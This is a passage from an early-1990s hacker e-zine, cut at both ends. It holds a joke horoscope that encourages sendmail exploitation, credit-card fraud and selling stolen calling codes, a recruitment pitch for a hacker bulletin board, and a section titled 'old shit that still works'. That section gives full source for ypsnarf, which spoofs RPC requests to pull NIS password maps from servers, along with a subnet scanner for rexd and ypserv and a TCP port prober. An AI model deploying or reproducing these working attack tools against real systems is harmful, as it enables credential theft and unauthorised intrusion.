  2949.    Virgo [August 23rd - September 22nd]
  2950.  
  2951.  Pluto tells us that you should stay away from VAXes in the near future.
  2952.  Lunatic force tells us that you might have more luck on Berkeley UNIX.
  2953.  Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
  2954.  Warning: In the first week of October, there is a risk of being ANIed.
  2955.  Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]
  2956.  
  2957.    Libra [September 23rd - October 22nd]
  2958.  
  2959.  The closer way of Mars around the Sun this year might mean that you
  2960.  will be sued by a telco or a big corporation. The eclipse of Uranus
  2961.  could say that you might have some luck and card a VGA 486 Laptop.
  2962.  Hint: Be careful on the cordless.
  2963.  Watch out for good stuff in dumpsters between July 23rd and July 31st.
  2964.  Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]
  2965.  
  2966.    Scorpio [October 23rd - November 21st]
  2967.  
  2968.  Sun propulsions say that you should spend more time exploring the
  2969.  innards of credit report systems, but be aware that Saturn reminds
  2970.  you that one local car dealer has his I.D. monitored.
  2971.  Hint: Stay out of #warez
  2972.  Warning: A star called 43-141 might be your doom. Watch out.
  2973.  Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
  2974.  
  2975.    Sagittarius [November 22nd - December 21st]
  2976.  
  2977.  Cold storms on Pluto suggest that you don't try to play eleet
  2978.  anarchist on one of the upcoming cons. Pluto also sees that there
  2979.  might be a slight chance that you catch a bullet pestering a cop.
  2980.  Hint: Be nice to your relatives.
  2981.  You might get lucky BSing during the third week of August.
  2982.  Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]
  2983.  
  2984.    Capricorn [December 22nd - January 19th]
  2985.  
  2986.  This summer brings luck to you. Everything you try is about to work
  2987.  out. You might find financial gain in selling k0DeZ to local warez
  2988.  bozos. Hint: Don't try to BS at a number who is a prime number, they
  2989.  will trace your ass and beat you to death with a raw cucumber.
  2990.  Special kick of luck between June 14th and July 2nd.
  2991.  Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]
  2992.  
  2993.    Aquarius [January 20th - February 18th]
  2994.  
  2995.  The third moon of Saturn suggests to stay in bed over the whole
  2996.  summer, or everything will worsen. Avoid to go to any meetings
  2997.  and cons. Do not try to get up before September 11th.
  2998.  Hint: You can risk to call PRODIGY and have a gR3aT time.
  2999.  Warning: High chance of eavesdroping on your line on August 14th.
  3000.  Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]
  3001.  
  3002.    Pisces [February 19th - March 20th]
  3003.  
  3004.  Mars reads a high mobility this summer. You should try to go to a
  3005.  foreign county, maybe visit HEU II. Finances will be OK. Do not go
  3006.  on any buses for that might be your doom.
  3007.  Hint: Don't get a seat near a window, whatever you do.
  3008.  Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
  3009.  Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
  3010.  
  3011.  
  3012. If your horoscope does not come true, complain to god@heaven.mil.   31337
  3013. If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R
  3014.  
  3015. ------------------------------------------------------------------------------
  3016.  
  3017. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3018.                    The SenseReal Mission
  3019.   If you are reading this it indicates you have reached a point
  3020. along your journey that you will have to decide whether you agree
  3021. with The SenseReal Foundation or whether you think that those who
  3022. believe and support The SenseReal Foundation are crazy. Your
  3023. decision to join The SenseReal Foundation on it's mission will
  3024. undoubtedly change your life forever. When you understand the
  3025. reason it exists and what it seeks you will better know how to
  3026. decide. That is why this text was created.
  3027.   He is known as Green Ghost. Some know him as Jim Nightshade. He
  3028. was born in 1966. He is not a baby boomer and he is not a
  3029. Generation Xer. He falls into that group of the population that
  3030. has so far escaped definition. He is a (yberpunk. He was (yberpunk
  3031. before (yberpunk was cool. He is the founder and leader of The
  3032. SenseReal Foundation. You will learn more about him later.
  3033.   But first you will have to know about the background. There once
  3034. was a man named Albert Hoffman. In 1943, on April 16 Hoffman
  3035. absorbed a threshold amount of the drug known as LSD. He
  3036. experienced "a peculiar restlessness". LSD since that time has
  3037. played an important role in this world.
  3038.   There are other agents involved in the story. Mary Pinchot, JFK,
  3039. Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
  3040. and many others. There are too many details and explanations
  3041. necessary to explain everything here. But this does not matter.
  3042.   Because the SenseReal Foundation is about riding the wave. We
  3043. believe that the ultimate goal cannot be defined. To define it
  3044. would be to destroy it.
  3045.   The SenseReal Foundation hopes that things can be changed for
  3046. the better. But we realize that the situation can become
  3047. much worse. From what history teaches us and what we instinctively
  3048. feel, we know that there is a great probability that things will
  3049. get much worse before and if things ever get better. Doom looms
  3050. on the horizon like an old friend.
  3051.   Freedom is being threatened every day and The SenseReal
  3052. Foundation seeks to defend and seek Freedom. Big Brother is here
  3053. NOW and to deny his existence is only to play into his hand. The
  3054. goal of our government both here in America and worldwide is to
  3055. remain in power and increase it's control of The People. To
  3056. expose Big Brother and destroy him is one of the many goals of
  3057. The SenseReal Foundation.
  3058.   As a member of (yberspace and an agent of The SenseReal
  3059. Foundation you will have to carefully consider your interaction
  3060. with the flow of Info. The ideals of Liberty must be maintained.
  3061.   The SenseReal Foundation provides a grounding point. The place
  3062. where the spark transfers from plasma to light and back to plasma.
  3063. Tesla was not on the wrong track. The SenseReal Foundation is a
  3064. mechanism which seeks to increase Freedom. Only by learning more
  3065. can we defeat the Evil. The Good must prevail.
  3066.   If you have the Hacker spirit and think along the same lines
  3067. then The SenseReal Foundation may be your calling. If you think
  3068. like J.R. Dobbs or Green Ghost then it is possible we can make it
  3069. through The Apocalypse. A final date has never been announced for
  3070. this event. Green Ghost does not claim to know the exact date but
  3071. he does claim to have some Info on it.
  3072.   Green Ghost does not claim to have all the answers or even to
  3073. know all the questions. He was first exposed to computers in the
  3074. early 70's at his local high school. The first computer he ever
  3075. used was a Honeywell terminal connected to a mainframe operated
  3076. at the home office of Honeywell and operated for the school.
  3077.   This machine was programed by feeding it stacks of cards with
  3078. boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
  3079. up to a printer which served for the monitor. The text was typed
  3080. out and the paper rolled out of the machine in great waves.
  3081. This experience left him wanting more. Somewhere between the
  3082. machine and the mind were all the questions and all the answers.
  3083.   The SenseReal Foundation will supply some of the means. We
  3084. must all work together if we are to succeed. UNITED WE STAND,
  3085. DIVIDED WE FALL. If you wish to participate with The SenseReal
  3086. Foundation you must devote yourself to becoming an Info Agent.
  3087.   As an Info Agent it is your duty to seek Truth and Knowledge
  3088. out wherever it is located. To Learn and to seek to increase
  3089. the Learning of all at The SenseReal Foundation. Different
  3090. people will be needed to help out in different ways.
  3091.   SenseReal's Info Agents are located all around the world and
  3092. are in contact with fellow SenseReal members via any one of
  3093. several SenseReal facilities. The primary establishment and
  3094. headquarters of The SenseReal Foundation is SenseReal's own
  3095. online system:
  3096.        T /-/ E  /-/ /=\ ( /< E R ' S  /\/\ /=\ /\/ S / O /\/
  3097.             >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
  3098.  27 Hours Per Day  /14.4 Supra /Home of The SenseReal Foundation
  3099. Also contact via SenseReal's mail drop by writing or sending
  3100. materials to:   TSF              \   Electronic Mail:
  3101.            P.O. BOX 6914         \   Green_Ghost@neonate.atl.ga.us
  3102.       HILTON HEAD, SC 29938-6914 \
  3103.   The Hacker's /\/\ansion is a system like no other. While it is
  3104. not your typical Hackers board it has much Info on Hacking. While
  3105. it is not like any Adult system you've ever seen it has the most
  3106. finest Adult material available anywhere. It is not a Warez board
  3107. but we are definitely Pirates. Because we are (yberpunks. What
  3108. makes the Hacker's Mansion different is our emphasis on quality.
  3109.   Everything that you find at The /-/acker's /\/\ansion is 1ST
  3110. (lass. All the coolest E-zines are pursued here. Phrack, CUD, and
  3111. Thought Virus to name just a few. Of course there is one other
  3112. source for Thought Virus:
  3113.   Send E-Mail to:  ListServ@neonate.atl.ga.us
  3114. In the subject or body of the message write:
  3115.   FAQ ThoughtCriminals
  3116. and you will receive the current issue in your E-Mail box in no
  3117. time.  If you wish to join the Thought Criminals mailing list and
  3118. communicate with your fellow Thought Criminals via E-Mail then
  3119. send another message to: ListServ@neonate.atl.ga.us
  3120. and write the following in the subject or body of the message:
  3121.   Subscribe ThoughtCriminals Your-Address-Here
  3122. or simply: Subscribe ThoughtCriminals
  3123. To mail others on the Thought Criminals mailing list send a message
  3124. to: ThoughtCriminals@neonate.atl.ga.us
  3125. Tell us all. Communication is vital. Our survival may depend on
  3126. it. The SenseReal Foundation is about the allegiance of many
  3127. people, and indeed beings, as our friends from other planets can
  3128. tell you. The EFF inspired us and was a model but we don't have
  3129. the EFF's money so we need YOU. If you are someone who can
  3130. contribute or who believes in The Cause or are just interested
  3131. in Tax Resistance or the Free The Weed movement then you should
  3132. join The SenseReal Foundation today. Contact us through any of
  3133. above channels and become a Freedom Fighter today. Time is of
  3134. the essence.
  3135. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3136.  
  3137. ------------------------------------------------------------------------------
  3138.  
  3139.                     ** OLD SHIT THAT STILL WORKS **
  3140.  
  3141.                            -  sometimes  -
  3142.  
  3143. /*
  3144.  * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN
  3145.  * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE
  3146.  * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM.  PLEASE DO NOT
  3147.  * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY.
  3148.  *
  3149.  * ypsnarf - exercise security holes in yp/nis.
  3150.  *
  3151.  * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
  3152.  * (casper@fwi.uva.nl).
  3153.  *
  3154.  * Usage:
  3155.  *  ypsnarf server client
  3156.  *   - to obtain the yp domain name
  3157.  *  ypsnarf server domain mapname
  3158.  *   - to obtain a copy of a yp map
  3159.  *  ypsnarf server domain maplist
  3160.  *   - to obtain a list of yp maps
  3161.  *
  3162.  * In the first case, we lie and pretend to be the host "client", and send
  3163.  * a BOOTPARAMPROC_WHOAMI request to the host "server".  Note that for this
  3164.  * to work, "server" must be running rpc.bootparamd, and "client" must be a
  3165.  * diskless client of (well, it must boot from) "server".
  3166.  *
  3167.  * In the second case, we send a YPPROC_DOMAIN request to the host "server",
  3168.  * asking if it serves domain "domain".  If so, we send YPPROC_FIRST and
  3169.  * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
  3170.  * "mapname".  Note that you must specify the full yp map name, you cannot
  3171.  * use the shorthand names provided by "ypcat".
  3172.  *
  3173.  * In the third case, the special map name "maplist" tells ypsnarf to send
  3174.  * a YPPROC_MAPLIST request to the server and get the list of maps in domain
  3175.  * "domain", instead of getting the contents of a map.  If the server has a
  3176.  * map called "maplist" you can't get it.  Oh well.
  3177.  *
  3178.  * Since the callrpc() routine does not make any provision for timeouts, we
  3179.  * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
  3180.  * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
  3181.  *
  3182.  * This program uses UDP packets, which means there's a chance that things
  3183.  * will get dropped on the floor; it's not a reliable stream like TCP.  In
  3184.  * practice though, this doesn't seem to be a problem.
  3185.  *
  3186.  * To compile:
  3187.  *  cc -o ypsnarf ypsnarf.c -lrpcsvc
  3188.  *
  3189.  * David A. Curry
  3190.  * Purdue University
  3191.  * Engineering Computer Network
  3192.  * Electrical Engineering Building
  3193.  * West Lafayette, IN 47907
  3194.  * davy@ecn.purdue.edu
  3195.  * January, 1991
  3196.  */
  3197. #include <sys/param.h>
  3198. #include <sys/socket.h>
  3199. #include <netinet/in.h>
  3200. #include <arpa/inet.h>
  3201. #include <rpc/rpc.h>
  3202. #include <rpcsvc/bootparam.h>
  3203. #include <rpcsvc/yp_prot.h>
  3204. #include <rpc/pmap_clnt.h>
  3205. #include <sys/time.h>
  3206. #include <signal.h>
  3207. #include <string.h>
  3208. #include <netdb.h>
  3209. #include <stdio.h>
  3210.  
  3211. #define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd  */
  3212. #define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
  3213. #define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */
  3214.  
  3215. char *pname;    /* program name   */
  3216.  
  3217. main(argc, argv)
  3218. char **argv;
  3219. int argc;
  3220. {
  3221.  char *server, *client, *domain, *mapname;
  3222.  
  3223.  pname = *argv;
  3224.  
  3225.  /*
  3226.   * Process arguments.  This is less than robust, but then
  3227.   * hey, you're supposed to know what you're doing.
  3228.   */
  3229.  switch (argc) {
  3230.  case 3:
  3231.   server = *++argv;
  3232.   client = *++argv;
  3233.  
  3234.   get_yp_domain(server, client);
  3235.   exit(0);
  3236.  case 4:
  3237.   server = *++argv;
  3238.   domain = *++argv;
  3239.   mapname = *++argv;
  3240.  
  3241.   if (strcmp(mapname, "maplist") == 0)
  3242.    get_yp_maplist(server, domain);
  3243.   else
  3244.    get_yp_map(server, domain, mapname);
  3245.   exit(0);
  3246.  default:
  3247.   fprintf(stderr, "Usage: %s server client         -", pname);
  3248.   fprintf(stderr, "to obtain yp domain name\n");
  3249.   fprintf(stderr, "       %s server domain mapname -", pname);
  3250.   fprintf(stderr, "to obtain contents of yp map\n");
  3251.   exit(1);
  3252.  }
  3253. }
  3254.  
  3255. /*
  3256.  * get_yp_domain - figure out the yp domain used between server and client.
  3257.  */
  3258. get_yp_domain(server, client)
  3259. char *server, *client;
  3260. {
  3261.  long hostip;
  3262.  struct hostent *hp;
  3263.  bp_whoami_arg w_arg;
  3264.  bp_whoami_res w_res;
  3265.  extern void timeout();
  3266.  enum clnt_stat errcode;
  3267.  
  3268.  /*
  3269.   * Just a sanity check, here.
  3270.   */
  3271.  if ((hp = gethostbyname(server)) == NULL) {
  3272.   fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
  3273.   exit(1);
  3274.  }
  3275.  
  3276.  /*
  3277.   * Allow the client to be either an internet address or a
  3278.   * host name.  Copy in the internet address.
  3279.   */
  3280.  if ((hostip = inet_addr(client)) == -1) {
  3281.   if ((hp = gethostbyname(client)) == NULL) {
  3282.    fprintf(stderr, "%s: %s: unknown host.\n", pname,
  3283.     client);
  3284.    exit(1);
  3285.   }
  3286.  
  3287.   bcopy(hp->h_addr_list[0],
  3288.         (caddr_t) &w_arg.client_address.bp_address.ip_addr,
  3289.         hp->h_length);
  3290.  }
  3291.  else {
  3292.   bcopy((caddr_t) &hostip,
  3293.         (caddr_t) &w_arg.client_address.bp_address.ip_addr,
  3294.         sizeof(ip_addr_t));
  3295.  }
  3296.  
  3297.  w_arg.client_address.address_type = IP_ADDR_TYPE;
  3298.  bzero((caddr_t) &w_res, sizeof(bp_whoami_res));
  3299.  
  3300.  /*
  3301.   * Send a BOOTPARAMPROC_WHOAMI request to the server.  This will
  3302.   * give us the yp domain in the response, IFF client boots from
  3303.   * the server.
  3304.   */
  3305.  signal(SIGALRM, timeout);
  3306.  alarm(YPSNARF_TIMEOUT1);
  3307.  
  3308.  errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
  3309.      BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
  3310.      xdr_bp_whoami_res, &w_res);
  3311.  
  3312.  alarm(0);
  3313.  
  3314.  if (errcode != RPC_SUCCESS)
  3315.   print_rpc_err(errcode);
  3316.  
  3317.  /*
  3318.   * Print the domain name.
  3319.   */
  3320.  printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);
  3321.  
  3322.  /*
  3323.   * The maximum domain name length is 255 characters, but the
  3324.   * rpc.bootparamd program truncates anything over 32 chars.
  3325.   */
  3326.  if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
  3327.   printf(" (truncated?)");
  3328.  
  3329.  /*
  3330.   * Put out the client name, if they didn't know it.
  3331.   */
  3332.  if (hostip != -1)
  3333.   printf(" (client name = %s)", w_res.client_name);
  3334.  
  3335.  putchar('\n');
  3336. }
  3337.  
  3338. /*
  3339.  * get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
  3340.  */
  3341. get_yp_map(server, domain, mapname)
  3342. char *server, *domain, *mapname;
  3343. {
  3344.  char *reqp;
  3345.  bool_t yesno;
  3346.  u_long calltype;
  3347.  bool (*xdr_proc)();
  3348.  extern void timeout();
  3349.  enum clnt_stat errcode;
  3350.  struct ypreq_key keyreq;
  3351.  struct ypreq_nokey nokeyreq;
  3352.  struct ypresp_key_val answer;
  3353.  
  3354.  /*
  3355.   * This code isn't needed; the next call will give the same
  3356.   * error message if there's no yp server there.
  3357.   */
  3358. #ifdef not_necessary
  3359.  /*
  3360.   * "Ping" the yp server and see if it's there.
  3361.   */
  3362.  signal(SIGALRM, timeout);
  3363.  alarm(YPSNARF_TIMEOUT1);
  3364.  
  3365.  errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
  3366.      xdr_void, 0);
  3367.  
  3368.  alarm(0);
  3369.  
  3370.  if (errcode != RPC_SUCCESS)
  3371.   print_rpc_err(errcode);
  3372. #endif
  3373.  
  3374.  /*
  3375.   * Figure out whether server serves the yp domain we want.
  3376.   */
  3377.  signal(SIGALRM, timeout);
  3378.  alarm(YPSNARF_TIMEOUT1);
  3379.  
  3380.  errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
  3381.      xdr_wrapstring, (caddr_t) &domain, xdr_bool,
  3382.      (caddr_t) &yesno);
  3383.  
  3384.  alarm(0);
  3385.  
  3386.  if (errcode != RPC_SUCCESS)
  3387.   print_rpc_err(errcode);
  3388.  
  3389.  /*
  3390.   * Nope...
  3391.   */
  3392.  if (yesno == FALSE) {
  3393.   fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
  3394.    server, domain);
  3395.   exit(1);
  3396.  }
  3397.  
  3398.  /*
  3399.   * Now we just read entry after entry...  The first entry we
  3400.   * get with a nokey request.
  3401.   */
  3402.  keyreq.domain = nokeyreq.domain = domain;
  3403.  keyreq.map = nokeyreq.map = mapname;
  3404.  reqp = (caddr_t) &nokeyreq;
  3405.  keyreq.keydat.dptr = NULL;
  3406.  
  3407.  answer.status = TRUE;
  3408.  calltype = YPPROC_FIRST;
  3409.  xdr_proc = xdr_ypreq_nokey;
  3410.  
  3411.  while (answer.status == TRUE) {
  3412.   bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));
  3413.  
  3414.   signal(SIGALRM, timeout);
  3415.   alarm(YPSNARF_TIMEOUT2);
  3416.  
  3417.   errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
  3418.       reqp, xdr_ypresp_key_val, &answer);
  3419.  
  3420.   alarm(0);
  3421.  
  3422.   if (errcode != RPC_SUCCESS)
  3423.    print_rpc_err(errcode);
  3424.  
  3425.   /*
  3426.    * Got something; print it.
  3427.    */
  3428.   if (answer.status == TRUE) {
  3429.    printf("%.*s\n", answer.valdat.dsize,
  3430.           answer.valdat.dptr);
  3431.   }
  3432.  
  3433.   /*
  3434.    * Now we're requesting the next item, so have to
  3435.    * send back the current key.
  3436.    */
  3437.   calltype = YPPROC_NEXT;
  3438.   reqp = (caddr_t) &keyreq;
  3439.   xdr_proc = xdr_ypreq_key;
  3440.  
  3441.   if (keyreq.keydat.dptr)
  3442.    free(keyreq.keydat.dptr);
  3443.  
  3444.   keyreq.keydat = answer.keydat;
  3445.  
  3446.   if (answer.valdat.dptr)
  3447.    free(answer.valdat.dptr);
  3448.  }
  3449. }
  3450.  
  3451. /*
  3452.  * get_yp_maplist - get the yp map list for  yp domain "domain" from server.
  3453.  */
  3454. get_yp_maplist(server, domain)
  3455. char *server, *domain;
  3456. {
  3457.  bool_t yesno;
  3458.  extern void timeout();
  3459.  struct ypmaplist *mpl;
  3460.  enum clnt_stat errcode;
  3461.  struct ypresp_maplist maplist;
  3462.  
  3463.  /*
  3464.   * This code isn't needed; the next call will give the same
  3465.   * error message if there's no yp server there.
  3466.   */
  3467. #ifdef not_necessary
  3468.  /*
  3469.   * "Ping" the yp server and see if it's there.
  3470.   */
  3471.  signal(SIGALRM, timeout);
  3472.  alarm(YPSNARF_TIMEOUT1);
  3473.  
  3474.  errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
  3475.      xdr_void, 0);
  3476.  
  3477.  alarm(0);
  3478.  
  3479.  if (errcode != RPC_SUCCESS)
  3480.   print_rpc_err(errcode);
  3481. #endif
  3482.  
  3483.  /*
  3484.   * Figure out whether server serves the yp domain we want.
  3485.   */
  3486.  signal(SIGALRM, timeout);
  3487.  alarm(YPSNARF_TIMEOUT1);
  3488.  
  3489.  errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
  3490.      xdr_wrapstring, (caddr_t) &domain, xdr_bool,
  3491.      (caddr_t) &yesno);
  3492.  
  3493.  alarm(0);
  3494.  
  3495.  if (errcode != RPC_SUCCESS)
  3496.   print_rpc_err(errcode);
  3497.  
  3498.  /*
  3499.   * Nope...
  3500.   */
  3501.  if (yesno == FALSE) {
  3502.   fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
  3503.    server, domain);
  3504.   exit(1);
  3505.  }
  3506.  
  3507.  maplist.list = (struct ypmaplist *) NULL;
  3508.  
  3509.  /*
  3510.   * Now ask for the list.
  3511.   */
  3512.  signal(SIGALRM, timeout);
  3513.  alarm(YPSNARF_TIMEOUT1);
  3514.  
  3515.  errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
  3516.      xdr_wrapstring, (caddr_t) &domain,
  3517.      xdr_ypresp_maplist, &maplist);
  3518.  
  3519.  alarm(0);
  3520.  
  3521.  if (errcode != RPC_SUCCESS)
  3522.   print_rpc_err(errcode);
  3523.  
  3524.  if (maplist.status != YP_TRUE) {
  3525.   fprintf(stderr, "%s: cannot get map list: %s\n", pname,
  3526.    yperr_string(ypprot_err(maplist.status)));
  3527.   exit(1);
  3528.  }
  3529.  
  3530.  /*
  3531.   * Print out the list.
  3532.   */
  3533.  for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
  3534.   printf("%s\n", mpl->ypml_name);
  3535. }
  3536.  
  3537. /*
  3538.  * print_rpc_err - print an rpc error and exit.
  3539.  */
  3540. print_rpc_err(errcode)
  3541. enum clnt_stat errcode;
  3542. {
  3543.  fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
  3544.  exit(1);
  3545. }
  3546.  
  3547. /*
  3548.  * timeout - print a timeout and exit.
  3549.  */
  3550. void timeout()
  3551. {
  3552.  fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
  3553.  exit(1);
  3554. }
  3555.  
  3556. ------------------------------------------------------------------------------
  3557.  
  3558. #!/bin/perl -s
  3559. #
  3560. #   Scan a subnet for valid hosts; if given hostname, will look at the
  3561. # 255 possible hosts on that net.  Report if host is running rexd or
  3562. # ypserv.
  3563. #
  3564. #  Usage:  scan n.n.n.n
  3565.  
  3566. # mine, by default
  3567. $default = "130.80.26";
  3568.  
  3569. $| = 1;
  3570.  
  3571. if ($v) { $verbose = 1; }
  3572.  
  3573. if ($#ARGV == -1) { $root = $default; }
  3574. else { $root = $ARGV[0]; }
  3575.  
  3576. # ip address
  3577. if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
  3578.         ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
  3579.         ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
  3580.         $root = "$one.$two.$three";
  3581.         if ($root eq "..") { die "Can't figure out what to scan...\n"; }
  3582.         }
  3583.  
  3584. print "Subnet $root:\n" if $verbose;
  3585. for $i (01..255) {
  3586.         print "Trying $root.$i\t=> " if $verbose;
  3587.         &resolve("$root.$i");
  3588.         }
  3589.  
  3590. #
  3591. #  Do the work
  3592. #
  3593. sub resolve {
  3594.  
  3595. local($name) = @_;
  3596.  
  3597. # ip address
  3598. if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
  3599.         ($a,$b,$c,$d) = split(/\./, $name);
  3600.         @ip = ($a,$b,$c,$d);
  3601.         ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
  3602.         }
  3603. else {
  3604.         ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
  3605.         ($a,$b,$c,$d) = unpack('C4',$ip[0]);
  3606.         }
  3607.  
  3608. if ($name && @ip) {
  3609.         print "$a.$b.$c.$d\t$name\n";
  3610.         system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
  3611. unning ypserv.\"\nfi\nfi");
  3612.         }
  3613. else { print "unable to resolve address\n" if $verbose; }
  3614.  
  3615. }
  3616.  
  3617. sub AF_INET {2;}
  3618.  
  3619. ------------------------------------------------------------------------------
  3620.  
  3621. /*
  3622.  * probe_tcp_ports
  3623.  */
  3624.  
  3625.  
  3626. #include <sys/types.h>
  3627. #include <sys/stat.h>
  3628. #include <stdio.h>
  3629. #include <ctype.h>
  3630. #include <sys/socket.h>
  3631. #include <netinet/in.h>
  3632. #include <netdb.h>
  3633.  
  3634. #define RETURN_ERR -1
  3635. #define RETURN_FAIL 0
  3636. #define RETURN_SUCCESS 1
  3637.  
  3638. int             Debug;
  3639. int             Hack;
  3640. int             Verbose;
  3641.  
  3642. main(ArgC, ArgV)
  3643.  int             ArgC;
  3644.  char          **ArgV;
  3645. {
  3646.  int             Index;
  3647.  int             SubIndex;
  3648.  
  3649.  for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
  3650.      for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
  3651.   switch (ArgV[Index][SubIndex])
  3652.   {
  3653.   case 'd':
  3654.    Debug++;
  3655.    break;
  3656.   case 'h':
  3657.    Hack++;
  3658.    break;
  3659.   case 'v':
  3660.    Verbose++;
  3661.    break;
  3662.   default:
  3663.    (void) fprintf(stderr,
  3664.   "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
  3665.    exit(1);
  3666.   }
  3667.  
  3668.  for (; Index < ArgC; Index++)
  3669.   (void) Probe_TCP_Ports(ArgV[Index]);
  3670.  exit(0);
  3671. }
  3672.  
  3673. Probe_TCP_Ports(Name)
  3674.  char           *Name;
  3675. {
  3676.  unsigned        Port;
  3677.  char           *Host;
  3678.  struct hostent *HostEntryPointer;
  3679.  struct sockaddr_in SocketInetAddr;
  3680.  struct hostent  TargetHost;
  3681.  struct in_addr  TargetHostAddr;
  3682.  char           *AddressList[1];
  3683.  char            NameBuffer[128];
  3684.  
  3685.  extern int      inet_addr();
  3686.  extern char    *rindex();
  3687.  
  3688.  if (Name == NULL)
  3689.   return (RETURN_FAIL);
  3690.  Host = Name;
  3691.  if (Host == NULL)
  3692.   return (RETURN_FAIL);
  3693.  HostEntryPointer = gethostbyname(Host);
  3694.  if (HostEntryPointer == NULL)
  3695.   {
  3696.   TargetHostAddr.s_addr = inet_addr(Host);
  3697.   if (TargetHostAddr.s_addr == -1)
  3698.    {
  3699.    (void) printf("unknown host: %s\n", Host);
  3700.    return (RETURN_FAIL);
  3701.    }
  3702.   (void) strcpy(NameBuffer, Host);
  3703.   TargetHost.h_name = NameBuffer;
  3704.   TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
  3705.    (char *) &TargetHostAddr;
  3706.   TargetHost.h_length = sizeof(struct in_addr);
  3707.   TargetHost.h_addrtype = AF_INET;
  3708.   TargetHost.h_aliases = 0;
  3709.   HostEntryPointer = &TargetHost;
  3710.   }
  3711.  SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
  3712.  bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
  3713.   HostEntryPointer->h_length);
  3714.  
  3715.  
  3716.  for (Port = 1; Port < 65536; Port++)
  3717.   (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
  3718.  return (RETURN_SUCCESS);
  3719. }
  3720.  
  3721. Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
  3722.  unsigned        Port;
  3723.  struct hostent *HostEntryPointer;
  3724.  struct sockaddr_in SocketInetAddr;
  3725. {
  3726.  char            Buffer[BUFSIZ];
  3727.  int             SocketDescriptor;
  3728.  struct servent *ServiceEntryPointer;
  3729.  
  3730.  
  3731.  SocketInetAddr.sin_port = Port;
  3732.  SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
  3733.  if (SocketDescriptor < 0)
  3734.   {
  3735.   perror("socket");
  3736.   return (RETURN_ERR);
  3737.   }
  3738.  if (Verbose)
  3739.   {
  3740.   (void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
  3741.          Port);
  3742.   if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
  3743.       (struct servent *) NULL)
  3744.    (void) printf(" (\"%s\" service) ",
  3745.           ServiceEntryPointer->s_name);
  3746.   (void) printf("connection ... ");
  3747.   (void) fflush(stdout);
  3748.   }
  3749.  if (connect(SocketDescriptor, (char *) &SocketInetAddr,
  3750.       sizeof(SocketInetAddr)) < 0)
  3751.   {
  3752.   if (Verbose)
  3753.    (void) printf("NOT open.\n");
  3754.   if (Debug)
  3755.    perror("connect");
  3756.   }
  3757.  else
  3758.   {
  3759.   if (!Verbose)
  3760.    {
  3761.    (void) printf("Host %s, Port %d ",
  3762.           HostEntryPointer->h_name, Port);
